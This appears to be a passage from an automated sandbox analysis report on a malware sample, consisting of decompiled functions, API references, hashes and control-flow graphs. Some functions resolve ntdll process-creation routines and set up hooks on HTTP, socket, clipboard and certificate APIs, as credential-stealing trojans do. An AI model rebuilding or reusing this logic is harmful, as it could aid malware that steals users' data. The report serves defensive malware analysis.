            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d28b656aaf4e45dbe2aebe2f091bb30d1a561210ca9d8f6f777e6cbafaf0dc85
            • Instruction ID: 4b2a6063bc310b9c8d2453bcedbd8375a9ce57764ac8f9d5ffb71517fb2634fb
            • Opcode Fuzzy Hash: d28b656aaf4e45dbe2aebe2f091bb30d1a561210ca9d8f6f777e6cbafaf0dc85
            • Instruction Fuzzy Hash: 84B1B071800215AADB24EFA5C941AFEB7B4FF04314F41452BF997B76C1D338A9A1CB68
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 61%
            			E0040F48A(char* __esi) {
            				void* _v40;
            				intOrPtr _v46;
            				signed char _v48;
            				struct _OSVERSIONINFOW _v324;
            				int _t15;
            				signed int _t18;
            				short _t22;
            				char* _t24;
            
            				_t24 = __esi;
            				E004104B9(__esi, 6);
            				_v324.dwOSVersionInfoSize = 0x11c;
            				_t15 = GetVersionExW( &_v324);
            				if(_t15 != 0) {
            					__imp__GetNativeSystemInfo( &_v40);
            					 *__esi = E0040F3B4();
            					_t18 = 0;
            					if(_v48 <= 0xff && _v46 == 0) {
            						_t18 = _v48 & 0x000000ff;
            					}
            					 *(_t24 + 1) = _t18;
            					asm("sbb eax, eax");
            					 *((short*)(_t24 + 2)) =  !0xffff & _v324.dwBuildNumber;
            					_t22 = _v40;
            					 *((short*)(_t24 + 4)) = _t22;
            					return _t22;
            				}
            				return _t15;
            			}

            0x0040f48a
            0x0040f496
            0x0040f4a2
            0x0040f4ac
            0x0040f4b4
            0x0040f4ba
            0x0040f4c5
            0x0040f4cc
            0x0040f4d2
            0x0040f4da
            0x0040f4da
            0x0040f4de
            0x0040f4ec
            0x0040f4f6
            0x0040f4fa
            0x0040f4fe
            0x00000000
            0x0040f4fe
            0x0040f503

            APIs
            • GetVersionExW.KERNEL32(?,?,00000006), ref: 0040F4AC
            • GetNativeSystemInfo.KERNEL32(?), ref: 0040F4BA
              • Part of subcall function 0040F3B4: GetVersionExW.KERNEL32(?,00000000), ref: 0040F3D3
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Version$InfoNativeSystem
            • String ID:
            • API String ID: 2518960133-0
            • Opcode ID: 078910cdb90759a2d7dab9f908eb402222ecb3a690a517749784946ccd7c3463
            • Instruction ID: fc9052333b891a287949a88adcc73f52bac45bd978bbcd408aef35d370843cb1
            • Opcode Fuzzy Hash: 078910cdb90759a2d7dab9f908eb402222ecb3a690a517749784946ccd7c3463
            • Instruction Fuzzy Hash: E701A9349012995ADB31EFB5C9056DEB7F4AF18300F0084BAD559F3A91E638DA88CB6D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 75%
            			E00416937(void* __ecx) {
            				void* _v8;
            				char* _t12;
            				intOrPtr _t13;
            				intOrPtr* _t14;
            				intOrPtr* _t16;
            				intOrPtr* _t18;
            				intOrPtr* _t20;
            				void* _t27;
            
            				_t12 =  &_v8;
            				_v8 = 0;
            				__imp__CoCreateInstance(0x401400, 0, 0x4401, 0x4013f0, _t12, _t27, __ecx);
            				if(_t12 != 0) {
            					_t13 = 0;
            				} else {
            					_t14 = _v8;
            					 *((intOrPtr*)( *_t14 + 0xfc))(_t14, 0);
            					_t16 = _v8;
            					 *((intOrPtr*)( *_t16 + 0x120))(_t16, 0);
            					_t18 = _v8;
            					 *((intOrPtr*)( *_t18 + 0x118))(_t18, 0);
            					_t20 = _v8;
            					 *((intOrPtr*)( *_t20 + 0x110))(_t20, 0xffffffff);
            					_t13 = _v8;
            				}
            				return _t13;
            			}

            0x0041693c
            0x00416952
            0x00416955
            0x0041695d
            0x00416999
            0x0041695f
            0x0041695f
            0x00416966
            0x0041696c
            0x00416973
            0x00416979
            0x00416980
            0x00416986
            0x0041698e
            0x00416994
            0x00416994
            0x0041699d

            APIs
            • CoCreateInstance.OLE32(00401400,00000000,00004401,004013F0,?,?,?,?,004169B0,?,?,?,?,004088C7,?,?), ref: 00416955
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CreateInstance
            • String ID:
            • API String ID: 542301482-0
            • Opcode ID: c5d050de737f0e002d35acc1570230c3144ce1b69476bd7c09722dbe22335522
            • Instruction ID: fad24edab999a4660c9e4c7dd33132fa5f88240d1f1c44a94e3da306fb0d0201
            • Opcode Fuzzy Hash: c5d050de737f0e002d35acc1570230c3144ce1b69476bd7c09722dbe22335522
            • Instruction Fuzzy Hash: 48016DB4A00218FFCB14CB95CD4DEDB7BBCEF49350B2001A5F805EB290C635AE01DA64
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00410542() {
            				long _t7;
            				signed int _t8;
            				intOrPtr _t9;
            				void* _t12;
            				void* _t14;
            
            				_t12 = _t14 - 0x78;
            				_t7 = GetTimeZoneInformation(_t12 - 0x34);
            				if(_t7 != 1) {
            					if(_t7 != 2) {
            						_t8 = 0;
            					} else {
            						_t9 =  *((intOrPtr*)(_t12 + 0x74));
            						goto L4;
            					}
            				} else {
            					_t9 =  *((intOrPtr*)(_t12 + 0x20));
            					L4:
            					_t8 = (_t9 +  *(_t12 - 0x34)) * 0xffffffc4;
            				}
            				return _t8;
            			}

            0x00410543
            0x00410551
            0x0041055a
            0x00410564
            0x00410573
            0x00410566
            0x00410566
            0x00000000
            0x00410566
            0x0041055c
            0x0041055c
            0x00410569
            0x0041056e
            0x0041056e
            0x00410579

            APIs
            • GetTimeZoneInformation.KERNEL32(?), ref: 00410551
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: InformationTimeZone
            • String ID:
            • API String ID: 565725191-0
            • Opcode ID: 4d3c7366648099c4f04f86286804f6de2ace1b654d1f210a2a9e286de0fd91f7
            • Instruction ID: 5e68c08ff2e91f53d0791e4979599644742aad1a517ca002781c8c94736de4ad
            • Opcode Fuzzy Hash: 4d3c7366648099c4f04f86286804f6de2ace1b654d1f210a2a9e286de0fd91f7
            • Instruction Fuzzy Hash: 10E08631A44108EBDB24DBA4DE419DD77FAAB05314F700926E501E2250D2A8D9C58E4A
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 41%
            			E004063F7() {
            				char _t1;
            				intOrPtr _t2;
            				signed int _t19;
            				void* _t21;
            				void* _t22;
            
            				_t1 =  *0x41a2b4;
            				if(_t1 == 0) {
            					_t1 =  *0x41a2b0;
            					 *0x41a024 = E00404984;
            				} else {
            					 *0x41a024 = E00404A40;
            				}
            				E0041A020 = _t1;
            				_t2 =  *0x41a2c0; // 0x77497840
            				 *0x41a030 = _t2;
            				 *0x41a040 = GetFileAttributesExW;
            				 *0x41a050 = HttpSendRequestW;
            				 *0x41a060 = HttpSendRequestA;
            				 *0x41a070 = HttpSendRequestExW;
            				 *0x41a080 = HttpSendRequestExA;
            				 *0x41a090 = InternetCloseHandle;
            				 *0x41a0a0 = InternetReadFile;
            				 *0x41a0b0 = __imp__InternetReadFileExA;
            				 *0x41a0c0 = InternetQueryDataAvailable;
            				 *0x41a0d0 = HttpQueryInfoA;
            				 *0x41a0e0 = __imp__#3;
            				 *0x41a0f0 = __imp__#19;
            				 *0x41a100 = __imp__WSASend;
            				 *0x41a110 = TranslateMessage;
            				_push(1);
            				 *0x41a120 = GetClipboardData;
            				_push( &E0041A020);
            				 *0x41a130 = __imp__PFXImportCertStore;
            				_t19 = 0x12;
            				return E00406290(_t19, _t21, _t22);
            			}

            0x004063f7
            0x004063fe
            0x0040640c
            0x00406411
            0x00406400
            0x00406400
            0x00406400
            0x0040641b
            0x00406420
            0x00406425
            0x0040642f
            0x00406439
            0x00406443
            0x0040644d
            0x00406457
            0x00406461
            0x0040646b
            0x00406475
            0x0040647f
            0x00406489
            0x00406493
            0x0040649d
            0x004064a7
            0x004064b1
            0x004064bb
            0x004064bd
            0x004064c7
            0x004064ce
            0x004064d3
            0x004064d9

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID:
            • String ID: @xIw
            • API String ID: 0-258518554
            • Opcode ID: 5d3636b379743b43a998289d071f6ea79033627c22d38d67340deb13f73d5198
            • Instruction ID: 3ee62b3f362d6feea330270f3c35af038253e78f494321a1bac97d5fb863b245
            • Opcode Fuzzy Hash: 5d3636b379743b43a998289d071f6ea79033627c22d38d67340deb13f73d5198
            • Instruction Fuzzy Hash: BD21D8B8A463449FD344DF68EA81A903BF0B34D764700827AE949E7771E375A864DB0E
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 98%
            			E00412FBB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
            				signed int _v8;
            				signed int _v12;
            				intOrPtr* _v16;
            				signed int _v20;
            				unsigned int _t67;
            				signed int _t68;
            				intOrPtr _t71;
            				void* _t79;
            				signed int _t81;
            				intOrPtr _t87;
            				intOrPtr _t88;
            				signed int _t98;
            				signed int _t99;
            				signed int _t100;
            				signed int _t101;
            				signed int _t102;
            				unsigned int _t103;
            				signed int _t104;
            				signed int _t106;
            				signed int _t108;
            				signed int _t111;
            				signed int _t115;
            				signed int _t116;
            				intOrPtr* _t119;
            				unsigned int _t125;
            				signed int _t126;
            				signed int _t128;
            
            				_t71 = _a4;
            				_t98 = 0;
            				_t99 = 0;
            				_v16 = 0;
            				_v20 = 1;
            				L1:
            				while(1) {
            					if(_t99 <= 0) {
            						_t103 =  *(_t98 + _t71);
            						_t98 = _t98 + 4;
            						_t99 = 0x1f;
            						_t104 = _t103 >> 0x1f;
            					} else {
            						_t99 = _t99 - 1;
            						_t104 = _t67 >> _t99 & 0x00000001;
            					}
            					if(_t104 != 0) {
            						_v16 = _v16 + 1;
            						 *((char*)(_v16 + _a12)) =  *(_t98 + _t71);
            						_t98 = _t98 + 1;
            						L6:
            						_t71 = _a4;
            						continue;
            					}
            					_v12 = 1;
            					do {
            						if(_t99 <= 0) {
            							_t67 =  *(_t98 + _t71);
            							_t98 = _t98 + 4;
            							_t100 = 0x1f;
            							_t106 = _t67 >> 0x1f;
            						} else {
            							_t100 = _t99 - 1;
            							_t106 = _t67 >> _t100 & 0x00000001;
            						}
            						_v12 = _t106 + _v12 * 2;
            						if(_t100 <= 0) {
            							_t67 =  *(_t98 + _t71);
            							_t98 = _t98 + 4;
            							_t99 = 0x1f;
            							_t108 = _t67 >> 0x1f;
            						} else {
            							_t99 = _t100 - 1;
            							_t108 = _t67 >> _t99 & 0x00000001;
            						}
            					} while (_t108 == 0);
            					_t111 = _v12;
            					if(_t111 == 2) {
            						_t81 = _v20;
            						L19:
            						_v12 = _t81;
            						if(_t99 <= 0) {
            							_t67 =  *(_t98 + _t71);
            							_t98 = _t98 + 4;
            							_t101 = 0x1f;
            							_v8 = _t67 >> 0x1f;
            						} else {
            							_t101 = _t99 - 1;
            							_v8 = _t67 >> _t101 & 0x00000001;
            						}
            						if(_t101 <= 0) {
            							_t67 =  *(_t98 + _t71);
            							_t98 = _t98 + 4;
            							_t99 = 0x1f;
            							_t115 = _t67 >> 0x1f;
            						} else {
            							_t99 = _t101 - 1;
            							_t115 = _t67 >> _t99 & 0x00000001;
            						}
            						_t116 = _t115 + _v8 * 2;
            						_v8 = _t116;
            						if(_t116 == 0) {
            							_v8 = 1;
            							do {
            								if(_t99 <= 0) {
            									_t125 =  *(_t98 + _t71);
            									_t98 = _t98 + 4;
            									_t102 = 0x1f;
            									_t126 = _t125 >> 0x1f;
            								} else {
            									_t102 = _t99 - 1;
            									_t126 = _t67 >> _t102 & 0x00000001;
            								}
            								_v8 = _t126 + _v8 * 2;
            								if(_t102 <= 0) {
            									_t67 =  *(_t98 + _t71);
            									_t98 = _t98 + 4;
            									_t99 = 0x1f;
            									_t128 = _t67 >> 0x1f;
            								} else {
            									_t99 = _t102 - 1;
            									_t128 = _t67 >> _t99 & 0x00000001;
            								}
            							} while (_t128 == 0);
            							_v8 = _v8 + 2;
            						}
            						asm("sbb ecx, ecx");
            						_v8 = _v8 +  ~0xd00;
            						_t87 = _v16;
            						_t119 = _t87 - _v12 + _a12;
            						_v16 = _t119;
            						 *((char*)(_t87 + _a12)) =  *_t119;
            						_t88 = _t87 + 1;
            						_v16 = _v16 + 1;
            						do {
            							 *((char*)(_t88 + _a12)) =  *_v16;
            							_t88 = _t88 + 1;
            							_v16 = _v16 + 1;
            							_t57 =  &_v8;
            							 *_t57 = _v8 - 1;
            						} while ( *_t57 != 0);
            						_v16 = _t88;
            						goto L6;
            					}
            					_t79 = ( *(_t98 + _t71) & 0x000000ff) + (_t111 + 0xfffffffd << 8);
            					_t98 = _t98 + 1;
            					if(_t79 != 0xffffffff) {
            						_t81 = _t79 + 1;
            						_v20 = _t81;
            						goto L19;
            					}
            					_t68 = _a16;
            					 *_t68 = _v16;
            					return _t68 & 0xffffff00 | _t98 == _a8;
            				}
            			}

            0x00412fc2
            0x00412fc6
            0x00412fcb
            0x00412fcd
            0x00412fd0
            0x00000000
            0x00412fd7
            0x00412fd9
            0x00412fec
            0x00412fee
            0x00412ff1
            0x00412ff2
            0x00412fdb
            0x00412fdb
            0x00412fe2
            0x00412fe2
            0x00412ff7
            0x00413002
            0x00413005
            0x00413008
            0x00413009
            0x00413009
            0x00000000
            0x00413009
            0x0041300e
            0x00413015
            0x00413017
            0x00413025
            0x0041302c
            0x0041302f
            0x00413030
            0x00413019
            0x00413019
            0x00413020
            0x00413020
            0x00413039
            0x0041303e
            0x0041304c
            0x00413053
            0x00413056
            0x00413057
            0x00413040
            0x00413040
            0x00413047
            0x00413047
            0x0041305a
            0x0041305e
            0x00413064
            0x00413066
            0x00413085
            0x00413085
            0x0041308a
            0x0041309b
            0x004130a0
            0x004130a8
            0x004130a9
            0x0041308c
            0x0041308c
            0x00413096
            0x00413096
            0x004130ae
            0x004130bc
            0x004130c3
            0x004130c6
            0x004130c7
            0x004130b0
            0x004130b0
            0x004130b7
            0x004130b7
            0x004130cd
            0x004130d0
            0x004130d5
            0x004130d7
            0x004130de
            0x004130e0
            0x004130f3
            0x004130f5
            0x004130f8
            0x004130f9
            0x004130e2
            0x004130e2
            0x004130e9
            0x004130e9
            0x00413102
            0x00413107
            0x00413115
            0x0041311c
            0x0041311f
            0x00413120
            0x00413109
            0x00413109
            0x00413110
            0x00413110
            0x00413123
            0x00413127
            0x00413127
            0x00413133
            0x00413137
            0x0041313a
            0x00413142
            0x00413147
            0x0041314d
            0x00413150
            0x00413151
            0x00413154
            0x0041315c
            0x0041315f
            0x00413160
            0x00413163
            0x00413163
            0x00413163
            0x00413168
            0x00000000
            0x00413168
            0x00413075
            0x00413077
            0x0041307b
            0x00413081
            0x00413082
            0x00000000
            0x00413082
            0x00413170
            0x0041317b
            0x00413182
            0x00413182

            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3e65220d72b0552e9fc1fb6bbe11ff6f12cdf0da83dde93640108036a636b790
            • Instruction ID: 53aff1dd60fc051f0cc40dfca40fbb7002e73854b4021133c6bcf00f89206fc1
            • Opcode Fuzzy Hash: 3e65220d72b0552e9fc1fb6bbe11ff6f12cdf0da83dde93640108036a636b790
            • Instruction Fuzzy Hash: E651E432E00A259BDB14CE98C4506EDF7B1EF89324F1A41AACD16BF385C675AE81D784
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0041168D() {
            				signed int _t18;
            				signed int _t55;
            				signed int* _t59;
            				signed int _t60;
            				signed int* _t61;
            
            				_t18 =  *0x41bc70;
            				if(_t18 >= 0x270) {
            					_t60 = 0;
            					do {
            						_t55 = _t60 << 2;
            						_t60 = _t60 + 1;
            						 *(0x41b2a0 + _t55) = (( *(_t55 + 0x41b2a4) ^  *(0x41b2a0 + _t55)) & 0x7fffffff ^  *(0x41b2a0 + _t55)) >> 0x00000001 ^  *(0x41a180 + ((( *(_t55 + 0x41b2a4) ^  *(0x41b2a0 + _t55)) & 0x7fffffff ^  *(0x41b2a0 + _t55)) & 0x00000001) * 4) ^  *(_t55 + 0x41b8d4);
            					} while (_t60 < 0xe3);
            					if(_t60 < 0x26f) {
            						_t59 =  &(0x41b2a0[_t60]);
            						do {
            							_t10 =  &(_t59[1]); // 0x4
            							_t61 = _t10;
            							 *_t59 =  *(0x41a180 + ((( *_t59 ^  *_t61) & 0x7fffffff ^  *_t59) & 0x00000001) * 4) ^  *(_t61 - 0x390) ^ (( *_t59 ^  *_t61) & 0x7fffffff ^  *_t59) >> 0x00000001;
            							_t59 = _t61;
            						} while (_t59 < 0x41bc5c);
            					}
            					 *0x41bc5c = (( *0x41b2a0 ^  *0x41bc5c) & 0x7fffffff ^  *0x41bc5c) >> 0x00000001 ^  *(0x41a180 + ((( *0x41b2a0 ^  *0x41bc5c) & 0x7fffffff ^  *0x41bc5c) & 0x00000001) * 4) ^  *0x41b8d0;
            					_t18 = 0;
            				}
            				 *0x41bc70 = _t18 + 1;
            				return (0x41b2a0[_t18] ^ 0x41b2a0[_t18] >> 0x0000000b ^ ((0x41b2a0[_t18] ^ 0x41b2a0[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x41b2a0[_t18] ^ 0x41b2a0[_t18] >> 0x0000000b ^ ((0x41b2a0[_t18] ^ 0x41b2a0[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x41b2a0[_t18] ^ 0x41b2a0[_t18] >> 0x0000000b ^ ((0x41b2a0[_t18] ^ 0x41b2a0[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x41b2a0[_t18] ^ 0x41b2a0[_t18] >> 0x0000000b ^ ((0x41b2a0[_t18] ^ 0x41b2a0[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
            			}

            0x0041168d
            0x00411697
            0x0041169f
            0x004116a6
            0x004116a8
            0x004116d3
            0x004116da
            0x004116da
            0x004116e8
            0x004116ea
            0x004116f1
            0x004116f3
            0x004116f3
            0x00411712
            0x00411714
            0x00411716
            0x004116f1
            0x00411745
            0x0041174a
            0x0041174a
            0x00411754
            0x0041177f

            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2146361baf1e7d1493d86167f4ec3e89f0e9dcd049390e2fd3f03e10c4c5607a
            • Instruction ID: 859c0f1a8cb9c525fdf76151fa0e92939cb901a38e5ca7e47d32616e49cc3b6b
            • Opcode Fuzzy Hash: 2146361baf1e7d1493d86167f4ec3e89f0e9dcd049390e2fd3f03e10c4c5607a
            • Instruction Fuzzy Hash: 122150323204158F9748CF39DC5969A33E2F78D358759857DD519CB2A0DB39E452CB88
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 44%
            			E0040CC5C(char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
            				void* _t13;
            
            				E00403E2A();
            				if(E00403E39() == 0 || _a8 == 0 || _a12 <= 0) {
            					L5:
            					return InternetReadFile();
            				}
            				_t19 = _a16;
            				if(_a16 == 0) {
            					goto L5;
            				}
            				_t13 = E0040C545(_t19,  &_a4, _a8, _a12, _a16);
            				if(_t13 == 0xffffffff) {
            					goto L5;
            				}
            				return _t13;
            			}

            • Instruction address range: 0x0040cc5f to 0x0040cc9d

            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CriticalObjectSectionSingleWait$EnterLeave
            • String ID:
            • API String ID: 1945063896-0
            • Opcode ID: 389b938b5b5fbcdec2cd92d8c8cdc1f78afd273547de950c4eeaf2ec6478a090
            • Instruction ID: 58740883f1ef1615bc24919872f8fd8ef850c194703329b0f93a6bd2ccec73bd
            • Opcode Fuzzy Hash: 389b938b5b5fbcdec2cd92d8c8cdc1f78afd273547de950c4eeaf2ec6478a090
            • Instruction Fuzzy Hash: 94E0923140424EDADF11AF70D9484AF3769EB08365B044737F82DB92D1E739C560DB59
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
            • Instruction ID: e65d746d6d55072558b95040d016f16811cc0288c30be6af9bb6f206a405ec3f
            • Opcode Fuzzy Hash: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
            • Instruction Fuzzy Hash: 6EE0DFBA702011CBC710CA11E480D83B7A6FBD8730B1286A5C8158B309DA38EDC389D1
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 299 4035c8-4035db call 414c0d 302 4035e1-4035ed 299->302 303 4035dd-4035df 299->303 305 403603-403626 call 403500 * 2 call 414f64 302->305 306 4035ef-4035f9 GetModuleHandleW 302->306 304 4035fe-403600 303->304 307 403628-403636 GetModuleHandleW 305->307 308 4035fb 305->308 306->307 306->308 307->308 312 403638-4036ab GetProcAddress * 6 307->312 310 4035fd 308->310 310->304 314 4036b9-4036bf 312->314 315 4036ad-4036b3 312->315 314->308 316 4036c5-4036cb 314->316 315->308 315->314 316->308 318 4036d1-4036d3 316->318 318->308 320 4036d9-4036db 318->320 320->310
            C-Code - Quality: 100%
            			E004035C8(void* __edx, signed int _a4) {
            				void* __edi;
            				void* _t4;
            				struct HINSTANCE__* _t6;
            				void* _t7;
            				struct HINSTANCE__* _t8;
            				_Unknown_base(*)()* _t14;
            				struct HINSTANCE__* _t15;
            				void* _t18;
            				void* _t19;
            				intOrPtr _t20;
            
            				_t19 = __edx;
            				_t20 = E00414C0D();
            				 *0x41a2a8 = _t20;
            				if(_t20 != 0) {
            					__eflags = _a4 & 0x00000001;
            					if((_a4 & 0x00000001) != 0) {
            						_t4 = E00403500(_t18, _t19, _t20, "GetProcAddress");
            						_t6 = E00414F64(_t18,  *0x41a2a4, E00403500(_t18, _t19, _t20, "LoadLibraryA"), _t4);
            						__eflags = _t6;
            						if(_t6 == 0) {
            							L4:
            							_t7 = 0;
            							__eflags = 0;
            							L5:
            							return _t7;
            						}
            						L8:
            						_t8 = GetModuleHandleW(L"ntdll.dll");
            						 *0x41a2ac = _t8;
            						__eflags = _t8;
            						if(_t8 == 0) {
            							goto L4;
            						}
            						 *0x41a2b0 = GetProcAddress(_t8, "NtCreateThread");
            						 *0x41a2b4 = GetProcAddress( *0x41a2ac, "NtCreateUserProcess");
            						 *0x41a2b8 = GetProcAddress( *0x41a2ac, "NtQueryInformationProcess");
            						 *0x41a2bc = GetProcAddress( *0x41a2ac, "RtlUserThreadStart");
            						 *0x41a2c0 = GetProcAddress( *0x41a2ac, "LdrLoadDll");
            						_t14 = GetProcAddress( *0x41a2ac, "LdrGetDllHandle");
            						 *0x41a2c4 = _t14;
            						__eflags =  *0x41a2b0; // 0x774c99e0
            						if(__eflags != 0) {
            							L11:
            							__eflags =  *0x41a2b8; // 0x774c9670
            							if(__eflags == 0) {
            								goto L4;
            							}
            							__eflags =  *0x41a2c0; // 0x77497840
            							if(__eflags == 0) {
            								goto L4;
            							}
            							__eflags = _t14;
            							if(_t14 == 0) {
            								goto L4;
            							}
            							_t7 = 1;
            							goto L5;
            						}
            						__eflags =  *0x41a2b4; // 0x774ca120
            						if(__eflags == 0) {
            							goto L4;
            						}
            						goto L11;
            					}
            					_t15 = GetModuleHandleW(0);
            					 *0x41a2a4 = _t15;
            					__eflags = _t15;
            					if(_t15 != 0) {
            						goto L8;
            					}
            					goto L4;
            				}
            				return 0;
            			}

            • Instruction address range: 0x004035c8 to 0x004036d9

            APIs
            • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000000,00403A84), ref: 004035F0
            • GetModuleHandleW.KERNEL32(ntdll.dll,00000000,LoadLibraryA,00000000,GetProcAddress,00000000,?,00000000,00403A84), ref: 0040362D
            • GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 00403644
            • GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 00403656
            • GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 00403668
            • GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 0040367A
            • GetProcAddress.KERNEL32(LdrLoadDll), ref: 0040368C
            • GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 0040369E
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: AddressProc$HandleModule
            • String ID: @xIw$GetProcAddress$LdrGetDllHandle$LdrLoadDll$LoadLibraryA$NtCreateThread$NtCreateUserProcess$NtQueryInformationProcess$RtlUserThreadStart$ntdll.dll
            • API String ID: 667068680-3133929969
            • Opcode ID: 543c6403585146024561e6f1501720aaabf06d58705456c233147a7fd5cc044b
            • Instruction ID: 5b133602ea308588cbd520664be43c3e4d92dbbf672ba60951e0d221763357b2
            • Opcode Fuzzy Hash: 543c6403585146024561e6f1501720aaabf06d58705456c233147a7fd5cc044b
            • Instruction Fuzzy Hash: 25217175906211BFCB116FA1DC869AB3E9CA60431231084BBE904733F1D77F45659E5E
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 559 40b6a0-40b6b7 560 40b919 559->560 561 40b6bd-40b6bf 559->561 562 40b91b-40b921 560->562 561->560 563 40b6c5-40b6cb 561->563 563->560 564 40b6d1-40b6d4 563->564 565 40b6da-40b6e6 564->565 566 40b7bf-40b7c2 564->566 568 40b6f3-40b6f7 565->568 569 40b6e8-40b6ed 565->569 566->560 567 40b7c8-40b7e1 EnterCriticalSection call 40b594 566->567 574 40b912 567->574 575 40b7e7-40b7ea 567->575 568->566 570 40b6fd-40b707 568->570 569->566 569->568 570->560 573 40b70d-40b713 570->573 576 40b715-40b718 573->576 577 40b728-40b72a 573->577 574->560 578 40b7f0-40b7f3 575->578 579 40b90a 575->579 576->577 580 40b71a-40b71d 576->580 577->560 581 40b730-40b732 577->581 578->579 582 40b7f9-40b7fc 578->582 584 40b90b-40b90d call 40b635 579->584 580->560 583 40b723-40b726 580->583 581->560 585 40b738-40b747 call 41065d 581->585 586 40b814-40b817 582->586 587 40b7fe-40b802 582->587 583->573 583->577 584->574 585->560 597 40b74d-40b769 EnterCriticalSection call 40b594 585->597 586->574 592 40b81d-40b82b 586->592 590 40b804-40b806 587->590 591 40b808-40b80c 587->591 590->586 590->591 591->586 594 40b80e-40b812 591->594 595 40b83d-40b845 592->595 596 40b82d-40b833 592->596 594->586 594->595 600 40b863-40b889 call 40f369 getpeername 595->600 596->595 598 40b835-40b83b 596->598 598->595 602 40b847-40b84d 598->602 607 40b781-40b789 597->607 608 40b76b-40b777 call 40b5cd 597->608 609 40b906-40b908 600->609 610 40b88b-40b896 call 413726 600->610 605 40b85b-40b862 602->605 606 40b84f-40b855 602->606 605->600 